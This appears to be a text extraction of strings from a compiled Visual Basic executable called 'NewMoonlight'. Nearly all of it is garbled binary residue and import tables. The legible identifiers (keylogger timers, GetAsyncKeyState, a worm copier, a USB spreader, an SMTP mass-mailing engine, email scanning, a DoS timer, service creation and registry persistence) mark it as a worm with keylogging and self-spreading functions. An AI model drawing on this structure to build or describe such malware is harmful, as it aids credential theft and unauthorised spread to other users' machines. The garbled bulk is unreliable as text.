L'%/S_
TT)9H$
tS>!J~a.uC
qlf;ufo-S
!\JU?x(7"DRi
i0P%^@
=tQ-\F60:u
e}Vtl_7NeW;
@0M-`E6
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMY:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkal
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
l/@LC_TIME
MONETARYCTYPEZ
OLLKnATEA
__GLOBe_HEAP_SELEEDn-`SVCRT/`CnMonTueWedThuFriSat5nFebMarApr
lAugSe
pOctNovDec~TZUv
PX (y8PX
])dn]l
Paggu&Uru
Ar1ntinaHPe_VColombi$
D+Qic; R
outh Afr.^m
Luxe9stagCSwitz
tIaCnd>p
i.s- 5dOra&rU)EnglxfF'"GOn/B?Mgium
Mexo/asq
Tcu{`;Y_-7
kqg'mh#dk & tob
UvakGg<o-,k-'i+
ew-ahggmV*
bte;/ci
ksss-f
i'u?k '?X
D'n^Jmi
.di{gW' s#
v'cIidgr7`fc/r'J['gGb]ivDa>
eMKzqOn/
sk'),1kO
'htsso5q
f'a|fL
k4-y7il/v
jG=irev-`ib+
aT`i7b
ttM[t'sa;0S'mpVV
:/MrrI
'wLOSS#
SING_?OMA%#R60U~28
- abl6m
a hpo.
GN7t.gqTNcGf\;
qao63<std5
rW+CgKcF c
opecU27
cW82<nIc3
Y_lock
AuAm_0xK9!UmH!
\V8</{
uPsV2f'
tup{"MdM[b
sf+VcTC++ R
7H:myd
, Mnk
AH{bp{
t)q15R
ne}ic0v
ny~vfG
vn^NfF>]
~3GetLaA?!Popup&Wi
ageBoxA
C=32.d
cmdM<exe/\
jHNhUKoc memory_*G zip l=t
\~ZDf5gC'y
z`d%Q[o{-b/$
uwmd7X
Orivgh-$^z
v*X~erboseunp#{.t
rqQuietnz9
Q'DOSNJk SF=
XozEnc
rNd^F8
ViA?ffs
s0ptsq
zdB])U[
2919
-leJd:dull&J
t'oF--
cEy[wl
O;6Hdo!
AB6plxk_tupj[p
bi*lMtOn gic`fz
|SeSby3
Lm&Bb#
7>0Axy
sbvh09.]buff
:;,=+"[]<>| /
$At!oYx:\
\\^YfZ
zQtfE6
=u,GwM
->d%%v
vp T(ofXa}
NffmDZ#
Gw#!r+bV
urd,-f
GF-ABF
dbKGyk8&
ypwi)^d[d;U
AmNPce5&!
s.]05O
W--biP
eXGZtGI{%2d
eaph CJDG3%nc'=-f+
@ge,+xx
d$ h2nbx\
9if;b
Rv%F`>O
-daX xgbu mdo
hh8A,[
[a%s:R(
#USqFt!
run,F+ 6eM
o-gV,y
Sx,15,H~!!X:`F?McK
[W]%XQ
e-u--=
02x,.X
k@:!IX=^z
UyZsd@&
%byaA;(
kK~sitb) !=QBj9qla3
_u0x4xN
\x fqg`P,w-HI
Eype(Qm( .WTb
3VHI>X
`85:F
o5fd%n
p?|rQK\
FC,iMz
3~l&$a
65AC6l
Yl/mV lip
4Z,2 Xu<0
F00e=7!
g:YwM4M
x_p40a
ybFIN
>1dSVESWE22-2EUQ4
-MVMEX
c07xDEApALUT
9h2%EN\S
"X`_DN`
W_C<CA
0GTMW+3S$CHE
W 20VV
\EN$4O?COL(8s%
RPER,J
HcSARG
030FECU9J44L
CHL88+sYURY<cZ@ZP/~
GBRC HNCZE.
|NLDHKGNZLa
|PRItSVKdNXKOldH<(TTO
ZHHI.CHS
ap?\T
BYYIJZYST G
\Ho8,mw/(
NPTBp^4+m
`P7<z
FEGYHMYNI|AhYYZXRDU4
\xLy<z
af50`y!O
_j2=Ws1~
<840,ii(
4MsM4Mi5^A
4MxldXL
4MHD<(
GetDriveTypeAM[^Lea
{RelseMuox
Wa=ForSoL[-ObjJ
)CloAH
eLdExch+g(t
2HpF#e
V4R!,l[rcmpi
u1PhNamn7
<To[3O+Loj
u'Curn%SC
vWidUr]`8
-l+e_-uqlm
K#hp0nlen_d+
8(TvIPTSae1n
S[E$-ZGWTewPUkdPi5PVmrDeCA[WrPoimOsh"Bj
fa LCI_D
W/-nB\:pa!A
Addrc
:T7eni
`;@`yL
89K}i#|l0Q1Op
6wvsptf
%.'$M{
;|-7CG
"9\akp
>EM+/@cB}d)O
)]bq)!
-_.1%0g/"5F
\5=[]u
!V}r{4O
XS<1#*BW!
3|CDxA
v0lC 33
iF%HO0[
WN_7=Y[
3h%E1
C& 85<9
R+5>I(
:1+E%G
@.MOD
re4w]O!0
[dZSB>
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
LoadLibraryA
GetProcAddress
OpenProcessToken
wvsprintfA
ZIP32.dll
ZpArchive
ZpGetOptions
ZpInit
ZpSetOptions
ZpVersion
5lJE@.F
:@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:cx>zx:@
2eTH@$2@
>e@>@0Ae@A@05@
@@$<x@<@0J`
5lJE@.F
C@HAm`A@
0`x9gx9@
5pJE@.F
:@HAp`A@
:\x>zx:@
C@p<pp<@
5lJE@.F
:@HAc`A@
0`x9gx9@
5pJE@.F
C@HAe`A@
:\x>zx:@
TH@$1@
JJ@.5@
>eHM@0>@
HQ@0:@
TR@$1@
HQ@0:@
A|HO@0M
TQ@$<@
qMzxM@
]Tp]@p@
5lJE@.F
=@HAm`A@
0`x9gx9@
5pJE@.F
C@HAp`A@
:\x>zx:@
<^xAex<@
Fyx:yxF@
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
`.data
R9N&Yk
I7$(CC
!FHlv9
e%:gKhCy
3 dOidogL
G%Hotgai
O,O/imM
#1?aIA$
C70a4>N
KERNEL32ADV
APIiUS5
pLibra[
&Hk~ -
&SVers'
}7)nJK7MThd
n,5-Wh
&lbUhI
a7*nx4
gZV[EWiWhK
,G5\6,*
u1>xlH&[
%Kj;E4[
P+uffm[
`<<<<U
7P+vkm7RoU+J
>uaq<W
y|E<,;m}2
H@Ekm)lQC.)F0!5_CE.A09k
5@6'/n@@F6y5.Ok
>@b5lJn.
_px=fC
9`xnBpv
Yx^X[<9
c4C2p`\p`!Gp
[,+n^([
Z("4[:
rn=&d6
>`T2`M
Af&>\+\k|
H+eT$5ee`>{
00T,8|
:O<9.2
<<>AO7
v>mo77+\$W7:T
4$y&7Kx@0`\
yVHpyCgye\CFxq4/
\@qT<TdA
qqgF<5 Tx:C
)99Q2)L
HsQy95[
2 llll
4`LLOeq&[
1^H1niF=V:<5
5qlw-/MvMN.d
p`$\73'E^MkY<`OO/3=TD
v/Avp[^
X:VEgr:al>Q@L`L`Z
p@+lpeeepeVgEx\
u1T1@qETX$+U2c(9
\1T@tM
e1Tp Xp 2pWWlBp
Wp=p$W%1T$iM
?Ug;<f
6QMM[#^Q~Qa!]6O0/l@
P9q8rphlH0n
`/$l2M6N
+6E+._QbyTTA*$RR@4-.QQ4mb.OO
G]9n0fX&
Q:.O=l(M=AO
ua>7'xy+0xOMK?L.Lp0K
g'@QA
JO7Jz]">o@9
'>ONm@_>y+X/~
_0lzvA
[.VRt;)v
GZ|oH7x
M499;;,y
CGz8Gv<
QJfdv
#em'm^
rQ6$mmm
LdLQ\X
X5:6]T]
/^&1<u+V;
V+nV;WCo1B@ePC`
`>pBZsF$
MmheslFFX
M< 9{0d0<c<y1_T<4cX
T<d\QFF/2}
adj_fptan?4DIku
|[CAry
57div_nm64k
+m1B,J
b"3 5CV
u)ERQ
)@E}`rG?V
rq1Pn{w.0
AEVENT_SIN-K_
DFuna4
I%Ompac,
vqrudseJ
^x-$aoy[`
2-,Dj<
}ZeZ/d$K#%U
FUu?isj
dff,mxw"%
O.mtp^
+@Oad=c
GPGWHU
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
KERNEL32.DLL
MSVBVM60.DLL
LoadLibraryA
GetProcAddress
ExitProcess
MSVBVM60.DLL
__vbaVarSub
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaVarVargNofree
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaPut3
__vbaEnd
__vbaFreeVarList
_adj_fdiv_m64
__vbaPut4
__vbaFreeObjList
_adj_fprem1
__vbaRecAnsiToUni
__vbaVarCmpNe
__vbaStrCat
__vbaLsetFixstr
__vbaRecDestruct
__vbaSetSystemError
__vbaNameFile
__vbaHresultCheckObj
__vbaLenVar
_adj_fdiv_m32
__vbaVarXor
__vbaAryDestruct
__vbaVarIndexLoadRefLock
__vbaVarForInit
__vbaExitProc
__vbaObjSet
__vbaStrLike
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaVarIndexLoad
__vbaStrFixstr
__vbaVargVar
__vbaBoolVarNull
__vbaRefVarAry
_CIsin
__vbaErase
__vbaVarZero
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGet3
__vbaStrCmp
__vbaAryConstruct2
__vbaGet4
__vbaVarTstEq
__vbaPutOwner3
__vbaObjVar
DllFunctionCall
__vbaVarLateMemSt
__vbaVarOr
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
__vbaRecUniToAnsi
EVENT_SINK_Release
__vbaNew
_CIsqrt
__vbaVarAnd
EVENT_SINK_QueryInterface
__vbaStrUI1
__vbaVarMul
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaInStrVar
__vbaUbound
__vbaStrVarVal
__vbaGetOwner3
__vbaVarCat
__vbaI2Var
_CIlog
__vbaFileOpen
__vbaR8Str
__vbaVar2Vec
__vbaInStr
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
__vbaPowerR8
_adj_fdiv_r
__vbaVarTstNe
__vbaVarSetVar
__vbaI4Var
__vbaVarCmpEq
__vbaAryLock
__vbaLateMemCall
__vbaVarAdd
__vbaStrToAnsi
__vbaVarDup
__vbaVarMod
__vbaFpI4
__vbaVarLateMemCallLd
__vbaVarCopy
__vbaRecDestructAnsi
__vbaVarSetObjAddref
__vbaLateMemCallLd
__vbaR8IntI2
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
_CItan
__vbaUI1Var
__vbaAryUnlock
__vbaVarForNext
_CIexp
__vbaI4ErrVar
__vbaFreeStr
__vbaFreeObj
L!This program cannot be run in DOS mG
.imports
NewMoonlight
FrmMain
ddddddddddddd
IIIIIIIIIIIIIId7I
ttttttttj
<<<<<<<T
1111111(o
Id7(1IIIIIIIIIIII
IIIII`
[fPFMlllll
[sTtpk_glllll
[wwwwnhGFlllll
[i>wTTTTTTTTwpNIMlll
[i)<<<<<<<<<<<<<<:nK_l
[i}<<<<<<<<<<<<<<<<<wl
[c*(((((((((((((((((wl
[>6cj0
"' 6Hx
.LjR=W
.Jbjx=l
[[[[[Y
[[[[[[
[[[[[[[
[q~b[Fllll
[c}ha[]dlll
[f}nKB\`lll
[f}ttttttttttnKG[llll
[@SStha[llll
[XwwwwwwwwwwwwwwSSSTTpNJBllll
[SSSSSSSSSSSSSSTTTTTTTTT:kK^l
[<<<<<<<<<<<<<<<<<<<<<<<<<<u9l
[A><<<<<<<<<<<<<<<<<<<<<<<<<<l
[V211111111111111111111111111l
[2(((((((((((((((((((((((((([l
[|%##########################Kl
[*'5[Dj{
"'/5H[DPY
! 6J[[Lj=
! 6J[[DDDDl
-Yjoz{
[[[[[jxzW
[[[[[[[[
[[[[[[[[7
MS Sans Serif
TxtCaption
TmrKeyLog
TmrTungguconect
TmrDos
Timer3
Timer2
VB5!*
FILE FOLDER
NewMoonlight
6d":hNc
global
Utilities
ScanEmail
FrmMain
basRegistry
modInet
newSmtp
basService
keylog
ModSmtpEngine
Modzip
ModNetwork
ModMoonUpdate
Modmidi
Modhtt
NewMoonlight
shell32.dll
ShellExecuteA
kernel32
GetWindowsDirectoryA
GetSystemDirectoryA
user32.dll
EnumWindows
user32
EnableWindow
GetParent
ShowWindow
GetWindowTextA
GetClassNameA
SendMessageA
FindWindowA
WritePrivateProfileStringA
GetPrivateProfileStringA
+3q"=h
Da~:W~D9
$!*O3f
TmrKeyLog
+3qC:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
Timer2
TxtCaption
Timer3
TmrDos
TmrTungguconect
wininet.dll
InternetCheckConnectionA
GetDriveTypeA
instal
CopyWoRm
setMyRegister
KIllallVirri
CopyYourUfd
StartMailWorm
SelamatkanMsVb
EndTKMnUW
CreateMutex
kirimbo
taroocx
dRopingAnyFiles
shellbi
buatOtomatis
FindFirstFileA
FindNextFileA
FindClose
VBA6.DLL
__vbaAryDestruct
__vbaPut4
__vbaPutOwner3
__vbaFileClose
__vbaGetOwner3
__vbaFileOpen
__vbaRedim
__vbaExitProc
__vbaVarMod
__vbaLenBstr
__vbaOnError
__vbaVarForNext
__vbaVarXor
__vbaI4Var
__vbaLenVar
__vbaVarForInit
__vbaVarMove
__vbaStrVarCopy
__vbaVarVargNofree
__vbaVarTstNe
__vbaR8IntI2
__vbaStrVarVal
__vbaStrLike
__vbaObjSet
__vbaFreeObj
__vbaVarDup
__vbaHresultCheckObj
__vbaNew2
__vbaVarTstEq
__vbaFixstrConstruct
__vbaFreeVar
__vbaFreeStrList
__vbaStrToUnicode
__vbaSetSystemError
__vbaStrI4
__vbaStrCat
__vbaStrToAnsi
__vbaFreeVarList
__vbaVarCat
__vbaStrVarMove
__vbaStrCmp
__vbaUbound
__vbaFreeStr
__vbaStrMove
__vbaStrCopy
advapi32.dll
OpenSCManagerA
CreateServiceA
DeleteService
CloseServiceHandle
WNetOpenEnumA
OpenServiceA
ws2_32.dll
WSAAsyncSelect
listen
accept
icmp.dll
IcmpCreateFile
IcmpCloseHandle
IcmpSendEcho
WSAStartup
gethostbyname
WSACleanup
RtlMoveMemory
wsock32.dll
gethostbyaddr
inet_addr
ioctlsocket
socket
connect
closesocket
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
InternetOpenA
InternetConnectA
__vbaGosubFree
__vbaGosub
__vbaVarIndexLoad
__vbaInStrVar
__vbaRefVarAry
__vbaErase
__vbaVarCopy
__vbaVarZero
moonlight.dll
ZpInit
ZpSetOptions
ZpGetOptions
ZpArchive
__vbaVarTstGt
__vbaVarCmpNe
__vbaVarCmpEq
__vbaVarOr
__vbaBoolVarNull
__vbaVarSub
__vbaVarAdd
__vbaObjVar
__vbaLateMemCall
__vbaVarLateMemCallLd
__vbaVargVar
__vbaLateMemCallLd
__vbaRecAnsiToUni
__vbaVarSetVar
__vbaInStr
__vbaVarSetObjAddref
__vbaLsetFixstr
__vbaStrFixstr
__vbaRecUniToAnsi
shell32
SHGetSpecialFolderLocation
SHGetPathFromIDListA
mpr.dll
WNetEnumResourceA
WNetCloseEnum
lstrlenA
lstrcpyA
WNetAddConnection2A
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegDeleteValueA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
winmm.dll
mciExecute
mciSendStringA
GetAsyncKeyState
GetKeyState
Kernel32.dll
RegisterServiceProcess
__vbaStrI2
__vbaVar2Vec
__vbaAryMove
__vbaPrintFile
__vbaNameFile
__vbaObjSetAddref
__vbaAryUnlock
__vbaVarIndexLoadRefLock
__vbaVarAnd
__vbaEnd
__vbaFreeObjList
__vbaI4ErrVar
__vbaI2Var
__vbaR8Str
__vbaGet4
__vbaPowerR8
__vbaVarMul
__vbaAryConstruct2
__vbaStrUI1
__vbaAryLock
__vbaNew
__vbaVarLateMemSt
__vbaGet3
__vbaFpI4
__vbaRecDestructAnsi
__vbaUI1Var
__vbaRecDestruct
__vbaPut3
buffer
namafile
drive2
]]]]]]xhXH8(
EMPUQRPxhPQPXRP
HP8QRP(PQP
Q(R8PHQXRhPxQERMPUQRj
UPh$a@
EMPUQERMPUQERMPQj
UERMPUQERMPUQERPj
Q(R8PHQXRhPxQERMPUQRj
jXh`a@
URhta@
EMPUQERPj
MUQR~
EMPUQERMPQj
EM3PQuu
4SVWeE
MfE_^d
PSVWeE
E3SPuu
UQREhd@
EEEEEtdD4$
L<DTPD4
R$PUQR
ETRPUQR
T\MPUQR
dtPUQRj
tSVWeE
uuuuuuuU
PMQURPEPMQPUREPPMQURP
EPMQUREPMQj
UREPMQUREPj
USVWeE@
URhpd@
EPMQEE
EPhpd@
MQURofEfEfEj
,SVWeE
UPQERMPQh0C
uuuu|l\L<,
|lhXH8(
,<QLR\PlQ|RMPUQERMPUQRj
|uf|f9U
f;t%X0C
l|QRPQRPQRP
R,P<QLR\PlQ|RMPUQERMPUQRj
}}}}}tdTD4$
MUQERPj
uuuutdTD40
MQR|0ttH
EMPUQERPj
4DQTRdPtQERMPUQERPj
CSVWeE
URhxs@
SVWeEP
}}}}}|lE
j`h`a@
SVWeE`
}}}}}tdTD4$
MUQERPj
SVWeEp
MPQuuu
uuuuuutplhEu@
f;t3xh
ERPEu@
UQREu@
EMPUQR$
MxQERPE v@
hhtElPQpRtPUQRlp
LQ]]]]
plhd`\HT
tPQhd@
hlQpRPj
tQRhd@
tQRhd@
hlPpQRj
tQRhd@
PEPh[@
tRPhd@
DlpRPj
dPh|i@
d#hRlPpQRj
\UQER`PQ3
\`RhPlQpRPj
UQERMPHQhRPfhlQpRPj
t@QRhd@
@tQRhd@
dRh|i@
#hPlQpRPj
\ERMP`QR0
\`PhQlRpPQj
ERMPUQHRhPQRhlRpPQj
6\`QdRhPlQpRPj
=-SVWeE
P\PxQR
QRPQRj
uuuuu|xhXHD@0
PRPUQR
Q R0PQj
PUR0PQ
EEMP QR
MPQ0RP
RhP0QR
Pl|PUQR
Q R0PQj
l|PUQR
f;tgh0QR
0RP VQ
f9toh0QR
f9t9hP0QR
f9t9hR0PQ
Q R0PQj
P Q0RPj
f9t60C
0QRf50C
f;t*U1C
L@DPQj
Q R0PQj
l|RPQRj
fEPMQj
UREPMQ
P`R0P Q
PQPR@P
PPpQ`R
PpR@P0Q
fpPQRPQR
R PPQR`PpQRPQRP
Q0R`P@QPRpPMQUREPMQUR@PpQPR`PQRPQRP QPR0P@Q`RPQRPQ
Q R@Pj7
R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`RpPQRPQRPQR
Q R0P@QPR`PpQRPQRPQRP
R P0Q@RPP`QpREPMQUREPMQURjL
}SVWeEP
fpUREPMQj
5UREPMQj
3UREPMQj
UREPMQURj
]]]]]|l\L<,
TSVWeE
E3PMuuu
MUVRME
MPQUVR
]]]]]|l\L<,
|xtplhd`\XTP
jPh`a@
E]EEPE
jXh`a@
P]PMh`@
MPEPPMh
MPUQERMPUQERMPQj
jhh`a@
Mp4VQPg(P
MPUQRj
MPUQRj
jXh`a@
EUERPuE
|ERMPUQRj
UER3MPQ
R,P<QLR\PlQ|RMPUQERPj
jXh`a@
EEMPQE
UQRPEMPQPUhX@
RPEh`@
UQERMPQj
MPUQRPEhd@
PPMh`@
ERMPUQRj
MPUQERMPUQERMPUQRj
R,P<QLR\PlQ|RMPUQERPj
=SVWeE
}#j|h`a@
}#jPh`a@
}#jXh`a@
MQUREPj
Q0R@PPQ`Rj
@QPR`Pj
@QPR`Pj
Q8Rhta@
Q8Rh @
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
}#jXh`a@
EPhta@
}#jXh`a@
URhta@
}#jXh`a@
MQhta@
PR0P Q
P@Q0R P
fMQUREPMQUREPj
pQtRxP|QUREPj
P0Q@RPPQRPQR
R0PPQ@R`Pj
MQUREPMQUREPj
pQtRxP|QUREPj
pQRPQRPQRP
R P0Q@RPP`QpRPQRPQRPQ
P Q0R@PPQ`Rj
MQURVwEPMQj
UREPMQj
EPMQURj
MQUREPj
UREPMQj
EPMQURj
rUREPMQURj
MQUREPj
pEPMQURj
MQUREPj
UREPMQj
EPMQURj
MQUREPMQj
EPMQURj
3EPMQUREPj
MQUREPj
}SVWeE
EPMQURj
Q4RPMQtR
EPMQUREPMQUREPj
4QDRTPdQtREPMQURj
PREPMQ
EPMQUREPj
$QTR4PDQdREPtQUREPj
$R4PDQTRdPtQUREPMQj
PMQh01C
4QDRTPdQtREPMQURj
PMQh\@
PMQhx@
PMQh`@
REPh`@
QURh`@
EPMQUREPMQj
UREPMQj
EPMQUREPMQj
UREPMQj
EPMQURj
iMQUREPMQUREPMQj
$R4PDQTRdPtQUREPMQj
R$P4QDRTPdQtREPj
fEfMf;
fEfMf;
EPMQUR
$P4QDRTPdQtRPQRPQRPQ
P$Q4RDPTQdRtPMQj
]SVWeE
MQtRdP,Q<REP
EPMQUR
`EPTQXR\P`QURc^M
,P<QUR
SVWeEX
URQ\E}
UREP8=MQURj
xPMQURj
EPMQ;UREPMQj
xREPMQj
PPPTQ3P
PHRLP3P
P@QDRd3P
EPMQUREPMQUREPMQUREPj
,MQURj
MQUREPMQUREPMQUREPMQj
,xREPMQj
EPMQUR
fMQUREPj
}#jXh`a@
MQhta@
UREPMQURj
UR$PMQ
URPQRPMQxQUREPj
}#jXh`a@
MQhta@
UREPMQURj
EPMQUR
dPtQTR
PTPQDR
fTQdRtPMQUREPj
fzRu)E
}#jXh`a@
EPhta@
MQUREPj
EPMQUR
fMQUREPj
BTu E
[MQURj
4PDQTRdPtQUREPMQURj
]]]]]p`PLk
jXh`a@
URhta@
EMPUQERPj
jXh`a@
EPhta@
3Mf9LUQR
PERMPUQERPj
pMPUQERMPUQRj
-}SVWeE
{SVWeE
SVWeEH
EMPQ5M
SVWeEX
jXh`a@
URhta@
EMPUQERPj
MUQERMPUQRj
vSVWeEh
}#j\h}@
}#jXh`a@
MQUREPMQj
tPMQ`W
}#j\h}@
UREPMQUREPj
TSVWeE
MPhls@
EMPQ/UERMPUQERMPQj
UERMPUQERMPQj
\SVWeE
j8h@a@
ERPEP@
j8h@a@
HSVWeE
QPUh`@
MPQPUh
ERMPUQRj
MjXha@
RPEh`@
PUQRPEh
MPUQERPj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
PPMh01C
MPQPUh
UQERMPUQRj
MjXha@
MPQPUh
UQERMPUQRj
MPUQERMPQj
-hSVWeE
EPMQURj
EPMQURj
UREPMQj
EPMQURj
,SVWeE0
3MEEEE
MEQRPPVC5p
SVWeE@
MEPUQRu
MfE_^d
|SVWeEP
3Muuuu
uuuuuuuu
EUPQRuuPE
9uu?UME`@
UEPMVQVERP
MUQMERPVUQRE
UMQERPu
UMPQVERP
UQREVP
f;~.OE
EUQERPE
lSVWeE`
3M}}}}}
Mf0QfFEf
UERMPQ
UERMPQj
UERMPQj
SVWeEp
]f]]]]]]]|ldE
j`h`a@
dUERPj
dUERPj
ddERPj
UERMPUQRj
f:u'EP
EMPUQERPj
uuuuxhXH8(
U8RMPQ
EMPUQERPj
hxRMPUQERMPUQRj
MfE_^d
TPLD@<,&
<@PDQRj
-<@PDQRj
MfP_^d
]]]]]]]p
0Mf;0Q
HUEERj
MMMMxMQMQMEEEEQp
EMPUQRj
MUQERPj
hSVWeE
ERPhdl@
UERPhdl@
MfE_^d
MfE_^d
TSVWeE
f3}}}}
MUQERMPQj
~XUWRj
UERMPUQRj
uuuuul
MQft,U
9l~_EURUE
HSVWeE
0RPP@Q
0Q@RPP`QUREPj
pQUREPj
pQUREPj
MQpRpP
MQUREPMQUREPMQUREPMQj
,`REPMQj
pREPMQj
pQUREPj
UREPpQ
`QpR`P
PQRPQRP
P Q0RPP@Q`RpPMQURj
MQUREP
RFEPMQj
PR`PpQUREPj
pQUREP
R<EPMQj
PMQUREPMQURj
QBUREPj
pPMQUR
`PpQUREPj
PMQURj
`PpQUREPj
pPMQUR
pPMQURj
UREPMQUREPMQUREPMQURj
,PQRPQRPQ
P Q0R@PPQ`RpPMQURj
EEEEtd
UQRPjh
lfUMPUQERP
UERMPQj
t|EQUVERP
URPEM+
-SVWeE
PMQ]tE
dSVWeEh
3RhD~@
3RhPg@
3Rh`v@
3Rhls@
3Rhhd@
MPUQRj
UQERPj
SVWeEx
4R6(48
4R8P$Q
Q$R4PDQj
4R8P$Q
Q$R4PDQj
R$P4QDRj
TRXP\Q`RdPhQlRpPtQxR|PQj
Q4R$PDQj
P$Q4RDPj
$Q4RDPj
QREPXQ
PQURXPMQDR0P
TRXP\Q`RdPhQlRpPtQxR|PQj
4DRTPdQtRPQRPQRPQ
P$Q4RDPj
^SVWeE
EPfMQjj
URhls@
fUREPj
MQhls@
f?fME
MQhls@
TSVWeE@
f;t-Uh01C
EMPUQREM
mASVWeE@
EPMQUR
?SVWeE@ @
EPMQUR
]>SVWeE @
MfMfUf;U
UREPMQ
UfUfEf;|
xfMfUf;t
];SVWeE
`PpQUREPMQUREP
`QpREPMQUREPMQj
fMfUf;
`RpPMQUREPMQURj
8SVWeE`!@
PPhP2C
URh(3C
SVWeE@"@
MfE_^d
2SVWeEP"@
}#j$h@
\fMfUf;X
UREPMQj
URtPxQ|REPMQUREPMQj
/UREPMQj
UREPMQj
m.SVWeE"@
EPMQUREP
EfEfMf;M
M,SVWeE
QUREPMQf
fMfUf;
0P@QPR`P
}#j h@
0P@QPR`Pj
PMQRh0{@
PMQh0{@
PEPpQh0{@
pREPh0{@
xQ|REPMQURj
pRh0{@
PMQPRh0{@
PPMQh0{@
pRtPxQ|REPMQURj
PPh0{@
PUR0Ph0{@
0QURh0{@
pPtQxR|PMQUREPj
0Qh0{@
PMQh0{@
PMQRh0{@
PMQh0{@
fUfEf;
P QPR`P@Q
}#j h@
Q R0P@Q`RPPj
0P@QPR`P
}#j h@
0P@QPR`Pj
ppQtRxP|QUREPMQj
P Q0R@PPQ`Rj
pQh0{@
PRh0{@
0Ph0{@
EPh0{@
SVWeE#@
SVWeE#@
M+PUREP
SVWeE8$@
lP\QLR
P8QUR6
EPMQUR
LSVWeE$@
XSVWeE$@
RPPjh
SVWeE$@
EEEExXH8(E
`hXRHP(Q8RMPQ
EEEMPQ
HUQERPP
UERMPUQRj
(8PUQR
xUQERMPUQRj
SVWeE$@
MQUREPj
UREPMQj
EEEE|l\L<,
<MPUQR
P,MPQP
PUQRPMPQP|RP
